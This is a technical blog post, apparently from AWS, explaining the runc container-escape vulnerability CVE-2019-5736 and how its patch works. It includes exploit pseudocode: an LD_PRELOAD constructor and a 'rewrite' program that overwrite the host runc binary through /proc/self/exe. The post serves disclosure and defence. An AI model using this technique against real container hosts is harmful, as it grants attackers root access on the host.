Note: This post was originally published on the AWS Compute Blog.

On Monday, February 11, CVE-2019-5736 was disclosed. This vulnerability is a flaw in runc, which can be exploited to escape Linux containers launched with Docker, containerd, CRI-O, or any other user of runc. But how does it work? Dive in!

This concern has already been addressed for AWS, and no customer action is required. For more information, see the security bulletin.

A review of Linux process management

Before I explain the vulnerability, here’s a review of some Linux basics.

Processes and syscalls

Processes form the core unit of running programs on Linux. Every launched program is represented by one or more processes. Processes contain a variety of data about the running program, including a process ID (pid), a table tracking in-use memory, a pointer to the currently executing instruction, a set of descriptors for open files, and so forth.

Processes interact with the operating system to perform a variety of operations (for example, reading and writing files, taking input, communicating on the network, etc.) via system calls, or syscalls. Syscalls can perform a variety of actions. The ones I’m interested in today involve creating other processes (typically through fork(2) or clone(2)) and changing the currently running program into something else (execve(2)).

File descriptors are how a process interacts with files, as managed by the Linux kernel. File descriptors are short identifiers (numbers) that are passed to the appropriate syscalls for interacting with files: read(2), write(2), close(2), and so forth.

Sometimes a process wants to spawn another process. That might be a shell running a program you typed at the terminal, a daemon that needs a helper, or even concurrent processing without threads. When this happens, the process typically uses the fork(2) or clone(2) syscalls.

These syscalls have some differences, but they both operate by creating another copy of the currently executing process and sharing some state. That state can include things like the memory structures (either shared memory segments or copies of the memory) and file descriptors.

After the new process is started, it’s the responsibility of both processes to figure out which one they are (am I the parent? Am I the child?). Then, they take the appropriate action. In many cases, the appropriate action is for the child to do some setup, and then execute the execve(2) syscall.

The following example shows the use of fork(2), in pseudocode:

func main() {
    child_pid= fork();
    if (child_pid > 0) {
        // This is the parent process, since child_pid is the pid of the child
        // process.
    } else if (child_pid == 0) {
        // This is the child process. It can retrieve its own pid via getpid(2),
        // if desired.  This child process still sees all the variables in memory
        // and all the open file descriptors.
    }
}

The execve(2) syscall instructs the Linux kernel to replace the currently executing program with another program, in-place. When called, the Linux kernel loads the new executable as specified and pass the specified arguments. Because this is done in place, the pid is preserved and a variety of other contextual information is carried over, including environment variables, the current working directory, and any open files.

func main() {
    // execl(3) is a wrapper around the execve(2) syscall that accepts the
    // arguments for the executed program as a list.
    // The first argument to execl(3) is the path of the executable to
    // execute, which in this case is the pwd(1) utility for printing out
    // the working directory.
    // The next argument to execl(3) is the first argument passed through
    // to the new program (in a C program, this would be the first element
    // of the argc array, or argc[0]).  By convention, this is the same as
    // the path of the executable.
    // The remaining arguments to execl(3) are the other arguments visible
    // in the new program's argc array, terminated by NULL.  As you're
    // not passing any additional arguments, just pass NULL here.
    execl("/bin/pwd", "/bin/pwd", NULL);
    // Nothing after this point executes, since the running process has been
    // replaced by the new pwd(1) program.
}

Wait…open files? By default, open files are passed across the execve(2) boundary. This is useful in cases where the new program can’t open the file, for example if there’s a new mount covering the existing path. This is also the mechanism by which the standard I/O streams (stdin, stdout, and stderr) are made available to the new program.

While convenient in some use cases, it’s not always desired to preserve open file descriptors in the new program. This behavior can be changed by passing the O_CLOEXEC flag to open(2) when opening the file or by setting the FD_CLOEXEC flag with fnctl(2). Using O_CLOEXEC or FD_CLOEXEC (which are both short for close-on-exec) prevents the new program from having access to the file descriptor.

func main() {
    // open(2) opens a file.  The first argument to open is the path of the file
    // and the second argument is a bitmask of flags that describe options
    // applied to the file that's opened.  open(2) then returns a file
    // descriptor, which can be used in subsequent syscalls to represent this
    // file.
    // For this example, open /dev/urandom, which is a file containing random
    // bytes.  Pass two flags: O_RDONLY and O_CLOEXEC; O_RDONLY indicates that
    // the file should be open for reading but not writing, and O_CLOEXEC
    // indicates that the file descriptor should not pass through the execve(2)
    // boundary.
    fd = open("/dev/urandom", O_RDONLY | O_CLOEXEC);
    // All valid file descriptors are positive integers, so a returned value < 0
    // indicates that an error occurred.
    if (fd < 0) {
        // perror(3) is a function to print out the last error that occurred.
        error("could not open /dev/urandom");
        // exit(3) causes a process to exit with a given exit code. Return 1
        // here to indicate that an error occurred.
        exit(1);
    }
}

What is /proc?

/proc (or proc(5)) is a pseudo-filesystem that provides access to a number of Linux kernel data structures. Every process in Linux has a directory available for it called /proc/[pid]. This directory stores a bunch of information about the process, including the arguments it was given when the program started, the environment variables visible to it, and the open file descriptors.

The special files inside /proc/[pid]/fd describe the file descriptors that the process has open. They look like symbolic links (symlinks), and you can see the original path of the file, but they aren’t exactly symlinks. You can pass them to open(2) even if the original path is inaccessible and get another working file descriptor.

Another file inside /proc/[pid] is called exe. This file is like the ones in /proc/[pid]/fd except that it points to the binary program that is executing inside that process.

/proc/[pid] also has a companion directory, /proc/self. This directory is always the same as /proc/[pid] of the process that is accessing it. That is, you can always read your own /proc data from /proc/self without knowing your pid.

Dynamic linking

When writing programs, software developers typically use libraries—collections of previously written code intended to be reused. Libraries can cover all sorts of things, from high-level concerns like machine learning to lower-level concerns like basic data structures or interfaces with the operating system.

In the code example above, you can see the use of a library through a call to a function defined in a library (fork).

Libraries are made available to programs through linking: a mechanism for resolving symbols (types, functions, variables, etc.) to their definition. On Linux, programs can be statically linked, in which case all the linking is done at compile time and all symbols are fully resolved. Or they can be dynamically linked, in which case at least some symbols are unresolved until a runtime linker makes them available.

Dynamic linking makes it possible to replace some parts of the resulting code without recompiling the whole application. This is typically used for upgrading libraries to fix bugs, enhance performance, or to address security concerns. In contrast, static linking requires re-compiling and re-linking each program that uses a given library to affect the same change.

On Linux, runtime linking is typically performed by ld-linux.so(8), which is provided by the GNU project toolchain. Dynamically linked libraries are specified by a name embedded into the compiled binary. This dynamic linker reads those names and then performs a search across a standard set of paths to find the associated library file (a shared object file, or .so).

The dynamic linker’s search path can be influenced by the LD_LIBRARY_PATH environment variable. The LD_PRELOAD environment variable can tell the linker to load additional, user-specified libraries before all others. This is useful in debugging scenarios to allow selective overriding of symbols without having to rebuild a library entirely.

The vulnerability

Now that the cast of characters is set (fork(2), execve(2), open(2), proc(5), file descriptors, and linking), I can start talking about the vulnerability in runc.

runc is a container runtime. Like a shell, its primary purpose is to launch other programs. However, it does so after manipulating Linux resources like cgroups, namespaces, mounts, seccomp, and capabilities to make what is referred to as a “container.”

The primary mechanism for setting up some of these resources, like namespaces, is through flags to the clone(2) syscall that take effect in the new process. The target of the final execve(2) call is the program the user requested. It With a container, the target of the final execve(2) call can be specified in the container image or through explicit arguments.

The CVE announcement states:

“The vulnerability allows a malicious container to […] overwrite the host runc binary […]. The level of user interaction is being able to run any command […] as root within a container [when creating] a new container using an attacker-controlled image.”

The operative parts of this are: being able to overwrite the host runc binary (that seems bad) by running a command (that’s…what runc is supposed to do…). Note too that the vulnerability is as simple as running a command and does not require running a container with elevated privileges or running in a non-default configuration.

Don’t containers protect against this?

Containers are, in many ways, intended to isolate the host from a given workload or to isolate a given workload from the host. One of the main mechanisms for doing this is through a separate view of the filesystem. With a separate view, the container shouldn’t be able to access the host’s files and should only be able to see its own. runc accomplishes this using a mount namespace and mounting the container image’s root filesystem as /. This effectively hides the host’s filesystem.

Even with techniques like this, things can pass through the mount namespace. For example, the /proc/cmdline file contains the running Linux kernel’s command-line parameters. One of those parameters typically indicates the host’s root filesystem, and a container with enough access (like CAP_SYS_ADMIN) can remount the host’s root filesystem within the container’s mount namespace.

That’s not what I’m talking about today, as that requires non-default privileges to run. The interesting thing today is that the /proc filesystem exposes a path to the original program’s file, even if that file is not located in the current mount namespace.

What makes this troublesome is that interacting with Linux primitives like namespaces typically requires you to run as root, somewhere. In most installations involving runc (including the default configuration in Docker, Kubernetes, containerd, and CRI-O), the whole setup runs as root.

runc must be able to perform a number of operations that require elevated privileges, even if your container is limited to a much smaller set of privileges. For example, namespace creation and mounting both require the elevated capability CAP_SYS_ADMIN, and configuring the network requires the elevated capability CAP_NET_ADMIN. You might see a pattern here.

An alternative to running as root is to leverage a user namespace. User namespaces map a set of UIDs and GIDs inside the namespace (including ones that appear to be root) to a different set of UIDs and GIDs outside the namespace. Kernel operations that are user-namespace-aware can delineate privileged actions occurring inside the user namespace from those that occur outside.

However, user namespaces are not yet widely employed and are not enabled by default. The set of kernel operations that are user-namespace-aware is still growing, and not everyone runs the newest kernel or user-space software.

So, /proc exposes a path to the original program’s file, and the process that starts the container runs as root. What if that original program is something important that you knew would run again… like runc?

Exploiting it!

runc’s job is to run commands that you specify. What if you specified /proc/self/exe? It would cause runc to spawn a copy of itself, but running inside the context of the container, with the container’s namespaces, root filesystem, and so on. For example, you could run the following command:

docker run --rm amazonlinux:2 /proc/self/exe

This, by itself, doesn’t get you far—runc doesn’t hurt itself.

Generally, runc is dynamically linked against some libraries that provide implementations for seccomp(2), SELinux, or AppArmor. If you remember from earlier, ld-linux.so(8) searches a standard set of file paths to provide these implementations at runtime. If you start runc again inside the container’s context, with its separate filesystem, you have the opportunity to provide other files in place of the expected library files. These can run your own code instead of the standard library code.

There’s an easier way, though. Instead of having to make something that looks like (for example) libseccomp, you can take advantage of a different feature of the dynamic linker: LD_PRELOAD. And because runc lets you specify environment variables along with the path of the executable to run, you can specify this environment variable, too.

With LD_PRELOAD, you can specify your own libraries to load first, ahead of the other libraries that get loaded. Because the original libraries still get loaded, you don’t actually have to have a full implementation of their interface. Instead, you can selectively override some common functions that you might want and omit others that you don’t.

So now you can inject code through LD_PRELOAD and you have a target to inject it into: runc, by way of /proc/self/exe. For your code to get run, something must call it. You could search for a target function to override, but that means inspecting runc’s code to figure out what could get called and how. Again, there’s an easier way. Dynamic libraries can specify a “constructor” that is run immediately when the library is loaded.

Using the “constructor” along with LD_PRELOAD and specifying the command as /proc/self/exe, you now have a way to inject code and get it to run. That’s it, right? You can now write to /proc/selcf/exe and overwrite runc!

Not so fast.

The Linux kernel does have a bit of a protection mechanism to prevent you from overwriting the currently running executable. If you open /proc/self/exe for writing, you get -ETXTBSY. This error code indicates that the file is busy, where “TXT” refers to the text (code) section of the binary.

You know from earlier that execve(2) is a mechanism to replace the currently running executable with another, which means that the original executable isn’t in use anymore. So instead of just having a single library that you load with LD_PRELOAD, you also must have another executable that can do the dirty work for you, which you can execve(2).

Normally, doing this would still be unsuccessful due to file permissions. Executables are typically not world-writable. But because runc runs as root and does not change users, the new runc process that you started through /proc/self/exe and the helper program that you executed are also run as root.

After you gain write access to the runc file descriptor and you’ve replaced the currently executing program with execve(2), you can replace runc’s content with your own. The other software on the system continues to start runc as part of its normal operation (for example, creating new containers, stopping containers, or performing exec operations inside containers). Your code has the chance to operate instead of runc. When it gets run this way, your code runs as root, in the host’s context instead of in the container’s context.

Now you’re done! You’ve successfully escaped the container and have full root access.

Putting that all together, you get something like the following pseudocode:

Pseudocode for preload.so

func constructor(){
    // /proc/self/exe is a virtual file pointing to the currently running
    // executable.  Open it here so that it can be passed to the next
    // process invoked.  It must be opened read-only, or the kernel will fail
    // the open syscall with ETXTBSY.  You cannot gain write access to the text
    // portion of a running executable.
    fd = open("/proc/self/exe", O_RDONLY);
    if (fd < 0) {
        error("could not open /proc/self/exe");
        exit(1);
    }
    // /proc/self/fd/%d is a virtual file representing the open file descriptor
    // to /proc/self/exe, which you opened earlier.
    filename = sprintf("/proc/self/fd/%d", fd);
    // execl is a call that executes a new executable, replacing the
    // currently running process and preserving aspects like the process ID.
    // Execute the "rewrite" binary, passing it arguments representing the
    // path of the open file descriptor. Because you did not pass O_CLOEXEC when
    // opening the file, the file descriptor remains open in the replacement
    // program and retains the same descriptor.
    execl("/rewrite", "/rewrite", filename, NULL);
    // execl never returns, except on an error
    error("couldn't execl");
}

Pseudocode for the rewrite program

// rewrite is your cooperating malicious program that takes an argument
// representing a file descriptor path, reopens it as read-write, and
// replaces the contents.  rewrite expects that it is unable to open
// the file on the first try, as the kernel has not closed it yet
func main(argc, *argv[]) {
    fd = 0;
    printf("Running\n");
    for(tries = 0; tries < 10000; tries++) {
        // argv[1] is the argument that contains the path to the virtual file
        // of the read-only file descriptor
        fd = open(argv[1], O_RDWR|O_TRUNC);
        if( fd >= 0 ) {
            printf("open succeeded\n");
            break;
        } else {
            if(errno != ETXTBSY) {
                // You expect a lot of ETXTBSY, so only print when you get
something else
                error("open");
            }
        }
    }
    if (fd < 0) {
        error("exhausted all open attempts");
        exit(1);
    }
    dprintf(fd, "CVE-2019-5736\n");
    printf("wrote over runc!\n");
    fflush(stdout);
}

The above code was written by Noah Meyerhans, iliana weller, and Samuel Karp.

How does the patch work?

If you try the same approach with a patched runc, you instead see that opening the file with O_RDWR is denied. This means that the patch is working!

The runc patch operates by taking advantage of some Linux kernel features introduced in kernel 3.17, specifically a syscall called memfd_create(2). This syscall creates a temporary memory-backed file and a file descriptor that can be used to access the file. This file descriptor has some special semantics: It is automatically removed when the last reference to it is dropped. It’s also in memory, so that just equates to freeing the memory. It supports another useful feature: file sealing. File sealing allows the file to be made immutable, even to processes that are running as root.

The runc patch changes the behavior of runc so that it creates a copy of itself in one of these temporary file descriptors, and then seals it. The next time a process launches (via fork(2)) or a process is replaced (via execve(2)), /proc/self/exe will be this sealed, memory-backed file descriptor. When your rewrite program attempts to modify it, the Linux kernel prevents it as it’s a sealed file.

Could I have avoided being vulnerable?

Yes, a few different mechanisms were available before the patch that provided mitigation for this vulnerability. The one that I mentioned earlier is user namespaces. Mapping to a different user namespace inside the container would mean that normal Linux file permissions would effectively prevent runc from becoming writable because the compromised process inside the container is not running as the real root user.

Another mechanism, which is used by Google Container-Optimized OS, is to have the host’s root filesystem mounted as read-only. A read-only mount of the runc binary itself would also prevent the runc binary from becoming writable.

SELinux, when correctly configured, may also prevent this vulnerability.

A different approach to preventing this vulnerability is to treat the Linux kernel as belonging to a single tenant, and spend your effort securing the kernel through another layer of separation. This is typically accomplished using a hypervisor or a virtual machine.

Amazon invests heavily in this type of boundary. Amazon EC2 instances, AWS Lambda functions, and AWS Fargate tasks are secured from each other using techniques like these. Amazon EC2 bare-metal instances leverage the next-generation Nitro platform that allows AWS to offer secure, bare-metal compute with a hardware root-of-trust. Along with traditional hypervisors, the Firecracker virtual machine manager can be used to implement this technique with function- and container-like workloads.

Further reading

The original researchers who discovered this vulnerability have published their own post, CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host. They describe how they discovered the vulnerability, as well as several other attempts.

I’d like to thank the original researchers who discovered the vulnerability for reporting responsibly and the OCI maintainers (and Aleksa Sarai specifically) who coordinated the disclosure. Thanks to Linux distribution maintainers and cloud providers who made updated packages available quickly. I’d also like to thank the Amazonians who made it possible for AWS customers to be protected: